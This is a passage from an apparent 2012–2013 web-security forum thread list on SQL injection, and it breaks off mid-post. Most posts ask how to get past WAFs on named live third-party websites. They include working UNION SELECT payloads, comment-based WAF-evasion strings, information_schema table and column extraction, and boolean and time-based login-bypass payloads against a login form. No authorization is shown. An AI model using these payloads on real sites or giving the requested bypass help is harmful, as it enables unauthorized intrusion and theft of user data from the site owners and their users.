Web Application Security Forum - SQL and Code Injection

how to bypass this WAF? (no replies)

annen — Mon, 20 May 2013 01:44:37 -0500

http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12--+

5.5.17
but cann't get database() and version(),and cann't get column_name or table_name
I have tried many methords to bypass ,but it doesn't work!

Thanks for your kindness replay!

Bypass ASP null byte (no replies)

m1cr0n — Mon, 13 May 2013 11:37:02 -0500

ANyone has idea to bypass asp with null byte on this link: http://bit.ly/17lNtvV

Thanks.

i can get data, plz help with this waf !!!!! (7 replies)

versus — Mon, 06 May 2013 20:02:12 -0500

hi after many test and check im blocked here :

www.site.com/?id=info_details&ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(table_name)),4,5,6,7,8,9+from /*!information_schema*/.tables limit 10,1--

i can get "user" , all okayyy :

now with this :

www.site.com/?id=info_details&ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(column_name)),4,5,6,7,8,9+from /*!information_schema*/.columns where table_name='users'--

im also do this :

.......table_name=CHAR(117, 115, 101, 114, 115)--

but i get nothing i can't extract data , what's my mistak,

no error and no data :(

tell me what's wrong plz, thnk's ,and for all your replay for my previos topic (thanggiangho, hack2012 ,ajkaro... ) it's help than ky u very much :)

a wierd Sql Injection (no replies)

Desperado — Fri, 26 Apr 2013 04:02:55 -0500

Injection:http://store.yam.com/store/index.php?action=store_product_sort&prod_sort_uid=400')%20and%201=2

This Injection can't be connected in sqlmap y others inject tools, these tools show me Host No Found. i've used the normal method like order by xx, it doesn't work here,and the this injection don't expose the mysql_error.

I think the sql is select * from xx where id in('xx'), any Helps??

waf or somthing wrong !!!! (2 replies)

versus — Tue, 30 Apr 2013 07:22:59 -0500

hi, and thnk's for this great forum :

i have probleme like that :

www.vuln.org?id=1'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource

ok

www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,3,4,5,6,7,8,9--

3 and 4

id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,version(),4,5,6,7,8,9--

5.5.23-55

ok

this is problem WAF block me here !!!!!!!

id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!group_concat*/(table_name),4,5,6,7,8,9 from /*!information_schema*/.tables where table_schema=database()--

i have this :

Forbidden

You don't have permission to access / on this server.

so with this

www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!table_name*/,4,5,5,6,7,8,9 /*!from*/ /*!InfoRmation_SCHEMa*/.`tables`--

i have :

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource

plz tell me other option to bypass this waf, thnk's.

how to bypass this WAF can u help plz (4 replies)

versus — Thu, 18 Apr 2013 12:01:08 -0500

this vuln url :
http://www.cobra.com.dz/produits_cat_detail.php?id=325'

Une erreur est survenue 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'325 AND actif=1' at line 1 Veuillez contacter votre administrateur

with sqlamp commnade check-waf : it's protected, no way to get databases how to bypass it ? plz

The Art of Exploiting Injection Flaws (no replies)

notsosecure — Mon, 15 Apr 2013 07:58:06 -0500

The popular course on Injection Flaws will return to Las Vegas at Black hat 2013.

More details can be found here:

https://www.blackhat.com/us-13/training/the-art-of-exploiting-injection-flaws.html

Some of the new additions to the course are:

Oracle SQLI- how to execute OS code, how to do priv esc from web app, OOB
extraction. Examples of burp pro missing SQLI. Injection in order by/group by, 2nd order injection etc.

XPath: We will show a new attack with which you can not just read any arbitrary XML file on system but any file with any extension.
LDAP- some really good example of auth bypass and blind ldap tool.
XXE- not too new stuff but good pointer on where to look for these.
Direct code injection- examples of recent ruby on rail and other framework issues such as expression query language injection etc.

Cheers
Sid

[SqlMap] How to Exploit Sqlia AND/OR time-based blind? (no replies)

Nerder — Mon, 25 Mar 2013 09:04:43 -0500

Hello everybody,

I found 2 different SQLIA in a website.
The Sqlia is POST method type and affected the login form.
The first one is:

Type:boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: account=-4241' OR (1251=1251)#&password=test

This one is pretty simple query, but return something strange, cause if i try for example to login with a specific accont and bypass the login looks like impossibile for me, cause with this query i grant the access of the last user register on the DB. I need some help for structure the query much better and bypass the login with all the user that i want.

The second one is:

Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: account=test' AND 1939=BENCHMARK(5000000,MD5(0x7463556e)) AND 'kpiJ'='kpiJ&password=test

This one works good, but not good enough, cause is pretty slow and sometimes sqlmap lost somechar.
With this one i was able to get some good information from the DB like (DBS, TABLES) but right now i need to get the COLUMNS, and after that the DATA, and i need something faster and clear.

Someone can help me to structure the best command line for setting up in the best way sqlmap for my needs?

Thx in advance.

(Dont ask me for the Link cause i cant share or provide in pvt as well)

[Perl] WebApp, How can i exploit? (3 replies)

Nerder — Sun, 10 Feb 2013 08:24:43 -0600

Hello everyone,
Is couple of days that i try to exploit this webapplication, coded in perl.

Someone already try to do something similar?
I hope in a fast help.
Thx in advance.

This one is a simple dork, many website use this application and everyone have the same vulnz:

http://goo.gl/cgnXG

this is the error that i found:

http://imgur.com/19kk2Q5

*Edit: correct some error.

SQLi problems. (4 replies)

Sr.Gr33n — Mon, 11 Mar 2013 11:29:04 -0500

Hi everybody, I'm having seriusly problems so as to make an SQLi.
I'm versus MYSQL 4.0.2 so it's a blind SQLi... and I'm trying to know table names..

1 and (/*!50000 Select*/ 1) = 1--

seems to be functional but i have tried

1 and (/*!50000 Select count(*) from*/ COLLATION) = 1 --

and I can't see the webpage... and It's strange because COLLATION is a table that ever exists... so I don't know where the problem is.

Gr33tings!

PD. I'm new in SQLi any guide is accepted.

[MsSQl Injection] Only select works and how to create an error. (2 replies)

netpumber — Thu, 07 Mar 2013 15:21:56 -0600

Hi.

I found this vuln and i m trying to exploit it two days now. It a little curious how it seems that it works.

with a single quote :

.asp?id=8'

RETURNED :

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ''.

But if you try to use group by or something like or 1=1 / and 1=1

.asp?id=8 having 1=1--
.asp?id=8 or 1=1--

RETURNED:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'having'.

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'or'.

After that i tried to see which sql command will not return error.
I ve just put select *

.asp?id=8 select *--

and RETURNED:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Must specify table to select from.

Hmm a different error from the others. So i said to try retrieve some table names from information_schema and i execute

.asp?id=8 select table_name from information_schema.tables--

but RETURNED no ERROR and page laded correctly.

I thought that my query was executed without an error and that's why it happened.
Let's create an error

.asp?id=8+convert(int,(select table_name from information_schema.tables))--

RETURNED:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'convert'.

So this is my story.
Does anyone have an idea on how to make it print out the error ?
Any hint is welcomed!

Only blind methord? (no replies)

annen — Mon, 31 Dec 2012 23:42:11 -0600

http://www.urbannovember.org/conference/rst.php?op=about_rst&cf=2&id=31' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53--+-
cann't have a valiable column.I know it can use blind ,but I want to know if UNION methord or error base methord can use or not .

help a 500 server error SQLi (1 reply)

annen — Fri, 12 Apr 2013 02:18:22 -0500

http://www.scnutrition.org/index.php?ax=view&id=119 union select1,2,3
500 server error ,when I use overflow methord it doesn't work!
can you help me to bypass this?
Thanks a lot!

Help me using a Padding Oracle Attack (no replies)

sukh0i — Sat, 22 Dec 2012 01:08:46 -0600

I have got an url :